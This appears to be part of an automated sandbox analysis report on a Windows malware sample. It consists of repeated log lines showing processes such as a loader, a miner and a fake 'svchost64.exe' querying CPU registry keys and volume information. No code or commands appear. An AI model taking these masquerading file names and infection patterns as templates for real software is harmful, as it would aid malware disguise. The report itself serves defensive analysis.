Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\miner2.0.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\svchost64.exe VolumeInformation
